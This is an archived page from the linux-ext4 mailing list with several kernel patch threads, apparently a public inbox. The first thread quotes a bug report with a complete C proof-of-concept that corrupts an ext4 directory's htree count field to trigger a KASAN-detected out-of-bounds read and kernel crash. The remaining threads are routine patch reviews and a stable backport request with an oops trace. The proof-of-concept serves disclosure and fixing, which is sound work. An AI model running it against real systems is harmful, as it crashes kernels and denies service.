compute the checksummed range, returning the same "corrupt, run e2fsck"
error path as the existing limit check. It will be included as the first
patch of the next version of this series, ahead of the patch that touches
this function, so the issue is fixed before it would otherwise be flagged
again.
Thanks again for the thorough analysis.
Artem
On Mon, 22 Jun 2026 at 18:29, XIAO WU <xiaowu.417@qq.com> wrote:
>
> Hi Artem,
>
> I came across the Sashiko AI review [1] of this patch and was able to
> reproduce a kernel crash triggered by a missing bounds check in
> ext4_dx_csum_verify(). Although the review notes this is a pre-existing
> issue (not introduced by your patch), I wanted to share the concrete
> reproduction evidence since this patch touches the same function.
>
> On Fri, Jun 19, 2026 at 03:10:05PM -0400, Artem Blagodarenko wrote:
> > @@ -456,7 +456,7 @@ static __le32 ext4_dx_csum(struct inode *inode,
> struct ext4_dir_entry *dirent,
> > }
> >
> > static int ext4_dx_csum_verify(struct inode *inode,
> > - struct ext4_dir_entry *dirent)
> > + struct ext4_dir_entry_2 *dirent)
> > {
> > struct dx_countlimit *c;
> > struct dx_tail *t;
>
> The problem is in the validation logic inside this function:
>
> c = get_dx_countlimit(inode, dirent, &count_offset);
> limit = le16_to_cpu(c->limit);
> count = le16_to_cpu(c->count); // ← read from disk, never validated
>
> if (count_offset + (limit * sizeof(struct dx_entry)) >
> EXT4_BLOCK_SIZE(inode->i_sb) - sizeof(struct dx_tail)) {
> warn_no_space_for_csum(inode);
> return 0;
> }
>
> t = (struct dx_tail *)(((struct dx_entry *)c) + limit);
>
> size = count_offset + (count * sizeof(struct dx_entry)); // ← uses unvalidated count
> csum = ext4_chksum(ei->i_csum_seed, (__u8 *)dirent, size);
> → crc32c() reads `size` bytes from bh->b_data
>
> The `limit` value is bounds-checked against the block size, but `count`
> is never validated. If a corrupted or maliciously crafted filesystem
> sets `count` to a large value like 65535, the computation:
>
> size = count_offset + (65535 * 8) = ~524288 bytes
>
> causes crc32c() to read far past the 4096-byte buffer_head allocation.
>
> Why KASAN reports this as use-after-free rather than out-of-bounds:
>
> The buffer_head's b_data is a kmalloc'd slab object. When crc32c()
> reads hundreds of kilobytes past the end of this 4K slab allocation, it
> crosses into adjacent slab pages. Those pages contain memory that was
> previously allocated and freed (old dentries, inode structures, etc.).
> KASAN's quarantine poisons freed slab objects, so the access lands on a
> poisoned freed page and triggers the slab-use-after-free detector:
>
> BUG: KASAN: use-after-free in crc32c+0x32a/0x380
> Read of size 1 at addr ffff88802ca54000 by task poc/10993
>
> The crash is deterministic with a crafted image and triggers on any
> directory read (getdents64 / ls).
>
> [Crash log — kernel 7.1.0-next-20260618, CONFIG_KASAN=y, SMP]
>
> Call Trace:
> <TASK>
> dump_stack_lvl
> print_report
> kasan_report
> crc32c+0x32a/0x380
> __ext4_read_dirblock+0x90f/0xbb0
> dx_probe+0xbb/0x1670
> ext4_htree_fill_tree+0x50e/0xb30
> ext4_readdir+0x241b/0x39d0
> iterate_dir+0x29b/0xaf0
> __x64_sys_getdents64+0x140/0x2c0
> do_syscall_64+0x129/0x880
> entry_SYSCALL_64_after_hwframe+0x77/0x7f
> </TASK>
>
> The PoC is attached below. It creates a 64 MB ext4 image with
> metadata_csum and dir_index, fills a directory with 800 files to
> trigger htree indexing, unmounts, then corrupts the dx_countlimit's
> count field via direct block write before remounting and listing the
> directory.
>
> gcc -o poc poc.c -static
>
> [1]
> https://sashiko.dev/#/patchset/20260619191022.27008-1-ablagodarenko%40thelustrecollective.com
> (Sashiko AI code review — "Out-of-Bounds Access", Severity: High)
>
> Thanks,
> XIAO
>
> // PoC: OOB read via unvalidated count in ext4_dx_csum_verify()
> #define _GNU_SOURCE
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <unistd.h>
> #include <sys/mount.h>
> #include <sys/stat.h>
> #include <fcntl.h>
> #include <errno.h>
> #include <sys/syscall.h>
> #include <stdint.h>
>
> #define IMG_PATH "poc_ext4.img"
> #define MNT_PATH "poc_mnt"
> #define IMG_SIZE (64 * 1024 * 1024)
> #define BLCK_SIZE 4096
>
> int main(int argc, char **argv)
> {
> char cmd[4096];
> int img_fd, ret;
> char loop_dev[64] = {0};
> unsigned char buf[BLCK_SIZE];
>
> printf("[*] ext4 dx_csum count OOB PoC\n");
>
> /* Cleanup from previous runs */
> system("umount poc_mnt 2>/dev/null");
> system("losetup -d /dev/loop0 2>/dev/null");
> system("rm -rf poc_mnt poc_ext4.img 2>/dev/null");
> mkdir(MNT_PATH, 0755);
>
> /* Create and format image with metadata_csum + dir_index */
> printf("[*] Creating 64 MB image, formatting ext4...\n");
> img_fd = open(IMG_PATH, O_CREAT | O_RDWR | O_TRUNC, 0644);
> if (img_fd < 0) { perror("open"); return 1; }
> ftruncate(img_fd, IMG_SIZE);
> close(img_fd);
> snprintf(cmd, sizeof(cmd),
> "mkfs.ext4 -F -O metadata_csum,dir_index,^has_journal "
> "-b %d %s 2>/dev/null", BLCK_SIZE, IMG_PATH);
> if (system(cmd) != 0) { fprintf(stderr, "mkfs failed\n"); return 1; }
>
> /* Setup loop device */
> printf("[*] Setting up loop...\n");
> snprintf(cmd, sizeof(cmd), "losetup -f %s 2>/dev/null && "
> "losetup -j %s | head -1 | cut -d: -f1", IMG_PATH, IMG_PATH);
> FILE *fp = popen(cmd, "r");
> if (fp) {
> if (fgets(loop_dev, sizeof(loop_dev), fp)) {
> char *nl = strchr(loop_dev, '\n');
> if (nl) *nl = '\0';
> }
> pclose(fp);
> }
> if (!strlen(loop_dev)) { fprintf(stderr, "loop setup failed\n");
> return 1; }
> printf("[*] Loop device: %s\n", loop_dev);
>
> /* Mount and create htree directory with 800 files */
> printf("[*] Mounting and creating htree directory...\n");
> if (mount(loop_dev, MNT_PATH, "ext4", 0, NULL) < 0) {
> perror("mount"); return 1;
> }
> mkdir(MNT_PATH "/dir", 0755);
> for (int i = 0; i < 800; i++) {
> char name[64];
> snprintf(name, sizeof(name), MNT_PATH "/dir/file_%04d", i);
> close(open(name, O_CREAT | O_WRONLY, 0644));
> }
> printf("[*] Unmounting to corrupt on-disk data...\n");
> umount(MNT_PATH);
>
> /*
> * Corrupt the dx_countlimit count field.
> * The htree root block is block 0 of the directory inode.
> * dx_countlimit is at offset 8 in the INDEX-type dx block:
> * struct dx_countlimit { __le16 limit; __le16 count; };
> * We set count = 0xFFFF (65535) to trigger massive OOB read.
> */
> printf("[*] Corrupting dx_countlimit.count in block 0...\n");
> img_fd = open(IMG_PATH, O_RDWR);
> if (img_fd < 0) { perror("open image"); return 1; }
> memset(buf, 0, BLCK_SIZE);
> /* Read block 0 of the directory inode. Directory inode is typically
> * inode #2 on a freshly formatted ext4. For simplicity we scan for
> * the INDEX signature (0x0A) at dx_root_info.dx_magic_offset. */
> /* Seek to block group 0's inode table — inode #2 is at offset
> * (2-1)*256 = 256 bytes into the inode table. The inode table starts
> * at block (superblock.s_first_ino_blocks + 1) or similar.
> * For standard ext4 with 4K blocks: inode table at block 1.
> * inode #2 at block 1 offset 256. i_block[0] gives the dir block. */
> unsigned char inode_buf[256];
> lseek(img_fd, BLCK_SIZE + 256, SEEK_SET); /* inode #2 */
> read(img_fd, inode_buf, 256);
> uint32_t dir_block = inode_buf[40] | (inode_buf[41]<<8) |
> (inode_buf[42]<<16) | (inode_buf[43]<<24);
> printf("[*] Directory root block: %u\n", dir_block);
>
> /* Read the dx root block, corrupt count at offset 10 (limit at 8,
> count at 10) */
> lseek(img_fd, dir_block * BLCK_SIZE, SEEK_SET);
> read(img_fd, buf, BLCK_SIZE);
> uint16_t *count_ptr = (uint16_t *)(buf + 10);
> printf("[*] Original count: %u, setting to 65535\n", *count_ptr);
> *count_ptr = 0xFFFF;
> lseek(img_fd, dir_block * BLCK_SIZE, SEEK_SET);
> write(img_fd, buf, BLCK_SIZE);
> fsync(img_fd);
> close(img_fd);
>
> /* Remount and trigger the bug by reading the directory */
> printf("[*] Remounting and triggering via getdents64...\n");
> if (mount(loop_dev, MNT_PATH, "ext4", 0, NULL) < 0) {
> perror("remount"); return 1;
> }
> /* ls triggers ext4_readdir → ext4_htree_fill_tree → dx_probe →
> csum verify */
> system("ls " MNT_PATH "/dir > /dev/null 2>&1");
> printf("[*] Done — check dmesg for KASAN report\n");
>
> umount(MNT_PATH);
> snprintf(cmd, sizeof(cmd), "losetup -d %s 2>/dev/null", loop_dev);
> system(cmd);
> return 0;
> }
>
>
^ permalink raw reply
* Re: [PATCH] ext4: cancel dirty accounting for folios without buffers
From: Jan Kara @ 2026-06-24 12:32 UTC (permalink / raw)
To: Zhu Jia
Cc: Zhang Yi, tytso, adilger.kernel, libaokun, jack, ojaswin,
ritesh.list, linux-ext4, linux-kernel, stable
In-Reply-To: <20260624094535.1-zhujia.zj@bytedance.com>
On Wed 24-06-26 17:52:06, Zhu Jia wrote:
> Hi Yi,
>
> Thanks for taking a look.
>
> Yes, clearing PAGECACHE_TAG_DIRTY/TOWRITE would make the page-cache state
> cleaner. I had a version that did this by adding a helper around
> folio_cancel_dirty() and clearing the xarray tags after confirming the
> folio was still the same clean page-cache entry.
>
> It looked like this:
>
> static void ext4_cancel_dirty_folio(struct address_space *mapping,
> struct folio *folio)
> {
> XA_STATE(xas, &mapping->i_pages, folio->index);
> unsigned long flags;
>
> folio_cancel_dirty(folio);
>
> xas_lock_irqsave(&xas, flags);
> if (xas_load(&xas) == folio && !folio_test_dirty(folio)) {
> xas_clear_mark(&xas, PAGECACHE_TAG_DIRTY);
> xas_clear_mark(&xas, PAGECACHE_TAG_TOWRITE);
> }
> xas_unlock_irqrestore(&xas, flags);
> }
>
> The reason I left the tags unchanged in this version is that I was not sure
> whether it is appropriate for ext4 to open-code xarray tag cleanup directly.
>
> If you think this is the right direction, I can add the helper back and
> send a v2.
That was a good judgement! Playing with xarray tags like this in filesystem
code is certainly not a good thing. For now, I'd leave the xarray tags
dangling - they will be eventually synced with reality on next writeback
attempt. If this inconsistency of tags needs to be fixed, the fix belongs
to the generic code (so that it can be used in other places as well).
Honza
--
Jan Kara <jack@suse.com>
SUSE Labs, CR
^ permalink raw reply
* Re: [PATCH 10/16] fs/buffer: Remove fs-layer decryption code
From: Jan Kara @ 2026-06-24 11:40 UTC (permalink / raw)
To: Eric Biggers
Cc: linux-fscrypt, linux-fsdevel, linux-ext4, linux-f2fs-devel,
linux-block, Christoph Hellwig, Theodore Ts'o, Andreas Dilger,
Baokun Li, Jan Kara, Ojaswin Mujoo, Ritesh Harjani, Zhang Yi,
Jaegeuk Kim, Chao Yu
In-Reply-To: <20260624050334.124606-11-ebiggers@kernel.org>
On Tue 23-06-26 22:03:28, Eric Biggers wrote:
> Now that fscrypt's file contents en/decryption is always implemented
> using blk-crypto when the filesystem is block-based, the fs-layer
> decryption code in fs/buffer.c is unused code. Remove it.
>
> Signed-off-by: Eric Biggers <ebiggers@kernel.org>
Fine by me. Feel free to add:
Reviewed-by: Jan Kara <jack@suse.cz>
Honza
> ---
> fs/buffer.c | 45 ++++++++-------------------------------------
> 1 file changed, 8 insertions(+), 37 deletions(-)
>
> diff --git a/fs/buffer.c b/fs/buffer.c
> index 9af5f061a1f8..21dd9596a941 100644
> --- a/fs/buffer.c
> +++ b/fs/buffer.c
> @@ -334,82 +334,53 @@ static void end_buffer_async_read(struct buffer_head *bh, int uptodate)
>
> still_busy:
> spin_unlock_irqrestore(&first->b_uptodate_lock, flags);
> }
>
> -struct postprocess_bh_ctx {
> +struct verify_bh_ctx {
> struct work_struct work;
> struct buffer_head *bh;
> struct fsverity_info *vi;
> };
>
> static void verify_bh(struct work_struct *work)
> {
> - struct postprocess_bh_ctx *ctx =
> - container_of(work, struct postprocess_bh_ctx, work);
> + struct verify_bh_ctx *ctx =
> + container_of(work, struct verify_bh_ctx, work);
> struct buffer_head *bh = ctx->bh;
> bool valid;
>
> valid = fsverity_verify_blocks(ctx->vi, bh->b_folio, bh->b_size,
> bh_offset(bh));
> end_buffer_async_read(bh, valid);
> kfree(ctx);
> }
>
> -static void decrypt_bh(struct work_struct *work)
> -{
> - struct postprocess_bh_ctx *ctx =
> - container_of(work, struct postprocess_bh_ctx, work);
> - struct buffer_head *bh = ctx->bh;
> - int err;
> -
> - err = fscrypt_decrypt_pagecache_blocks(bh->b_folio, bh->b_size,
> - bh_offset(bh));
> - if (err == 0 && ctx->vi) {
> - /*
> - * We use different work queues for decryption and for verity
> - * because verity may require reading metadata pages that need
> - * decryption, and we shouldn't recurse to the same workqueue.
> - */
> - INIT_WORK(&ctx->work, verify_bh);
> - fsverity_enqueue_verify_work(&ctx->work);
> - return;
> - }
> - end_buffer_async_read(bh, err == 0);
> - kfree(ctx);
> -}
> -
> /*
> * I/O completion handler for block_read_full_folio() - folios
> * which come unlocked at the end of I/O.
> */
> static void bh_end_async_read(struct bio *bio)
> {
> struct buffer_head *bh;
> bool uptodate = bio_endio_bh(bio, &bh);
> struct inode *inode = bh->b_folio->mapping->host;
> - bool decrypt = fscrypt_inode_uses_fs_layer_crypto(inode);
> struct fsverity_info *vi = NULL;
>
> /* needed by ext4 */
> if (bh->b_folio->index < DIV_ROUND_UP(inode->i_size, PAGE_SIZE))
> vi = fsverity_get_info(inode);
>
> - /* Decrypt (with fscrypt) and/or verify (with fsverity) if needed. */
> - if (uptodate && (decrypt || vi)) {
> - struct postprocess_bh_ctx *ctx = kmalloc_obj(*ctx, GFP_ATOMIC);
> + /* Verify (with fsverity) if needed. */
> + if (vi && uptodate) {
> + struct verify_bh_ctx *ctx = kmalloc_obj(*ctx, GFP_ATOMIC);
>
> if (ctx) {
> ctx->bh = bh;
> ctx->vi = vi;
> - if (decrypt) {
> - INIT_WORK(&ctx->work, decrypt_bh);
> - fscrypt_enqueue_decrypt_work(&ctx->work);
> - } else {
> - INIT_WORK(&ctx->work, verify_bh);
> - fsverity_enqueue_verify_work(&ctx->work);
> - }
> + INIT_WORK(&ctx->work, verify_bh);
> + fsverity_enqueue_verify_work(&ctx->work);
> return;
> }
> uptodate = false;
> }
> end_buffer_async_read(bh, uptodate);
> --
> 2.54.0
>
--
Jan Kara <jack@suse.com>
SUSE Labs, CR
^ permalink raw reply
* Re: [PATCH] ext4: zero non-uptodate buffers before encryption in writeback
From: Jan Kara @ 2026-06-24 11:32 UTC (permalink / raw)
To: Yun Zhou
Cc: tytso, adilger.kernel, libaokun, jack, ojaswin, ritesh.list,
yi.zhang, linux-ext4, linux-kernel
In-Reply-To: <20260624065948.85415-1-yun.zhou@windriver.com>
On Wed 24-06-26 14:59:48, Yun Zhou wrote:
> ext4_bio_write_folio() encrypts the folio content from offset 0 up to
> round_up(len, blocksize) before submitting IO. When blocksize < PAGE_SIZE,
> this range may include blocks that are not being written out (holes,
> delay, or unwritten blocks). If the folio was freshly allocated by the
> page cache (via write_begin) for a partial-page write, these non-target
> blocks may remain uninitialized from the buddy allocator.
>
> The encryption engine (AES-XTS) then reads these uninitialized bytes as
> operands, triggering a KMSAN uninit-value report in aes_encrypt().
>
> Fix this by zeroing any non-uptodate buffer that is not being written
> out, before calling fscrypt_encrypt_pagecache_blocks(). This ensures the
> crypto engine never operates on uninitialized data regardless of which
> blocks are actually being submitted for IO.
>
> The common case of blocksize == PAGE_SIZE is unaffected since there can
> be no non-overlapping blocks within a single-block folio.
>
> Reported-by: syzbot+7add5c56bc2a14145d20@syzkaller.appspotmail.com
> Closes: https://syzkaller.appspot.com/bug?extid=7add5c56bc2a14145d20
> Signed-off-by: Yun Zhou <yun.zhou@windriver.com>
Eric has just sent a patch set that deletes this code [1]. So I think this
patch isn't needed anymore.
[1] lore.kernel.org/20260624050334.124606-1-ebiggers@kernel.org
Honza
> ---
> fs/ext4/page-io.c | 10 ++++++++++
> 1 file changed, 10 insertions(+)
>
> diff --git a/fs/ext4/page-io.c b/fs/ext4/page-io.c
> index bc674aa4a656..2d380b5a1501 100644
> --- a/fs/ext4/page-io.c
> +++ b/fs/ext4/page-io.c
> @@ -555,12 +555,22 @@ int ext4_bio_write_folio(struct ext4_io_submit *io, struct folio *folio,
> * block which might be needed. This may cause some unneeded blocks
> * (e.g. holes) to be unnecessarily encrypted, but this is rare and
> * can't happen in the common case of blocksize == PAGE_SIZE.
> + *
> + * Zero out any non-uptodate buffers that are not being written out,
> + * to prevent uninitialized memory from being fed into the crypto
> + * engine.
> */
> if (fscrypt_inode_uses_fs_layer_crypto(inode)) {
> gfp_t gfp_flags = GFP_NOFS;
> unsigned int enc_bytes = round_up(len, i_blocksize(inode));
> struct page *bounce_page;
>
> + do {
> + if (!buffer_async_write(bh) && !buffer_uptodate(bh))
> + folio_zero_range(folio, bh_offset(bh),
> + bh->b_size);
> + } while ((bh = bh->b_this_page) != head);
> +
> /*
> * Since bounce page allocation uses a mempool, we can only use
> * a waiting mask (i.e. request guaranteed allocation) on the
> --
> 2.43.0
>
--
Jan Kara <jack@suse.com>
SUSE Labs, CR
^ permalink raw reply
* [RESEND] "ext4: get rid of ppath in get_ext_path()" 6.6.y backport request
From: Yoann Congal @ 2026-06-24 10:24 UTC (permalink / raw)
To: stable
Cc: Baokun Li, Jan Kara, Ojaswin Mujoo, Theodore Ts'o,
Andreas Dilger, linux-ext4
Hello,
(Resent with developers/maintainers of the patch in CC)
I'd like to request the backport of
6b854d552711 ("ext4: get rid of ppath in get_ext_path()")
on the 6.6.y branch.
Rationale:
6.6.130 commit fb138df7d886 ("ext4: get rid of ppath in ext4_ext_insert_extent()")
created a regression in ext4_ext_map_blocks() by changing the value of path
on error (NULL -> ERR_PTR). But path is only checked for NULL
in ext4_free_ext_path() (not for ERR_PTR).
The check is added in 6b854d552711 ("ext4: get rid of ppath in get_ext_path()"),
hence this backport request.
More details:
This regression was triggered during an LTP test run for a 6.6.129->6.6.142
upgrade of a Yocto Project stable branch:
https://autobuilder.yoctoproject.org/valkyrie/#/builders/98/builds/3837
-> https://valkyrie.yocto.io/pub/non-release/20260622-121/testresults/qemuarm64-ltp/core-image-sato/qemu_boot_log.20260623002740
[ 6952.500858] Unable to handle kernel paging request at virtual address ffffffffffffffec
[ 6952.503768] Mem abort info:
[ 6952.504431] ESR = 0x0000000096000005
[ 6952.505333] EC = 0x25: DABT (current EL), IL = 32 bits
[ 6952.506541] SET = 0, FnV = 0
[ 6952.507354] EA = 0, S1PTW = 0
[ 6952.508154] FSC = 0x05: level 1 translation fault
[ 6952.509208] Data abort info:
[ 6952.509849] ISV = 0, ISS = 0x00000005, ISS2 = 0x00000000
[ 6952.511175] CM = 0, WnR = 0, TnD = 0, TagAccess = 0
[ 6952.512372] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0
[ 6952.513667] swapper pgtable: 4k pages, 39-bit VAs, pgdp=0000000041250000
[ 6952.514909] [ffffffffffffffec] pgd=0000000000000000, p4d=0000000000000000, pud=0000000000000000
[ 6952.516423] Internal error: Oops: 0000000096000005 [#1] PREEMPT SMP
[ 6952.517503] Modules linked in: x_tables tun loop [last unloaded: ip6_tables]
[ 6952.518691] CPU: 1 PID: 1078 Comm: kworker/u12:1 Tainted: G W 6.6.142-yocto-standard #1
[ 6952.520269] Hardware name: linux,dummy-virt (DT)
[ 6952.521094] Workqueue: writeback wb_workfn (flush-7:0)
[ 6952.521985] pstate: 60400005 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)
[ 6952.523184] pc : ext4_ext_map_blocks+0x260/0x1860
[ 6952.524011] lr : ext4_ext_map_blocks+0xdb8/0x1860
[ 6952.524851] sp : ffffffc086a3b620
[ 6952.525421] x29: ffffffc086a3b740 x28: ffffffffffffffe4 x27: 000000000000808c
[ 6952.526624] x26: ffffff8017dd9000 x25: 000000000000808c x24: 0000000000000002
[ 6952.527849] x23: ffffff8035e766c8 x22: ffffff802e589690 x21: 000000000000042f
[ 6952.529087] x20: ffffffc086a3b948 x19: ffffff8035e767f0 x18: 0000000000000000
[ 6952.530310] x17: ffffffc081691310 x16: fffffffe001ab548 x15: 0000005564d4cb48
[ 6952.531519] x14: 00000000ffffffff x13: 0000000000000000 x12: ffffffffffffffc0
[ 6952.532683] x11: 0000000000000040 x10: ffffff8005d81d80 x9 : ffffffc0803cce14
[ 6952.533886] x8 : 00000000bab647bc x7 : 0000000000000000 x6 : 000000000000d847
[ 6952.535065] x5 : 0000000000000000 x4 : 0000000000316019 x3 : 0000000000000000
[ 6952.536264] x2 : 0000000000000000 x1 : 0000000000000000 x0 : ffffff803deec880
[ 6952.537425] Call trace:
[ 6952.537860] ext4_ext_map_blocks+0x260/0x1860
[ 6952.538589] ext4_map_blocks+0x19c/0x598
[ 6952.539258] ext4_do_writepages+0x5a4/0xbe0
[ 6952.539977] ext4_writepages+0x84/0x110
[ 6952.540624] do_writepages+0x94/0x1e0
[ 6952.541240] __writeback_single_inode+0x60/0x4d8
[ 6952.542086] writeback_sb_inodes+0x208/0x4b0
[ 6952.542812] __writeback_inodes_wb+0x58/0x118
[ 6952.543578] wb_writeback+0x274/0x440
[ 6952.544198] wb_workfn+0x3b0/0x5c8
[ 6952.544788] process_one_work+0x16c/0x3e0
[ 6952.545434] worker_thread+0x1b4/0x378
[ 6952.546059] kthread+0x118/0x128
[ 6952.546599] ret_from_fork+0x10/0x20
[ 6952.547197] Code: 2a0103f9 b9009fe1 b9000e99 b40055fc (79401398)
[ 6952.548170] ---[ end trace 0000000000000000 ]---
[ 6952.551090] ------------[ cut here ]------------
Reading the resulting code in 6.6.142:
fs/ext4/extents.c:
int ext4_ext_map_blocks(handle_t *handle, struct inode *inode,
struct ext4_map_blocks *map, int flags)
{
struct ext4_ext_path *path = NULL;
// ...
got_allocated_blocks:
path = ext4_ext_insert_extent(handle, inode, path, &newex, flags);
if (IS_ERR(path)) {
err = PTR_ERR(path);
/*
* Gracefully handle out of space conditions. If the filesystem
* is inconsistent, we'll just leak allocated blocks to avoid
* causing even more damage.
*/
// ...
goto out;
}
// ...
out:
ext4_free_ext_path(path);
trace_ext4_ext_map_blocks_exit(inode, flags, map,
err ? err : allocated);
return err ? err : allocated;
}
=> Under an out-of-space condition (which LTP triggers a *LOT*), the ERR_PTR path is
passed unmodified to ext4_free_ext_path(), which only does a NULL check (no IS_ERR)
before dereferencing it. That produces the oops and then the LTP failure.
Notably, master commit 6b854d552711 ("ext4: get rid of ppath in get_ext_path()")
never got backported to 6.6.y, but it does add the IS_ERR_OR_NULL() check
to ext4_free_ext_path():
void ext4_free_ext_path(struct ext4_ext_path *path)
{
+ if (IS_ERR_OR_NULL(path))
+ return;
Thanks!
--
Yoann Congal
Smile ECS
^ permalink raw reply
page: next (older) | prev (newer) | latest
- recent:[subjects (threaded)|topics (new)|topics (active)]
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox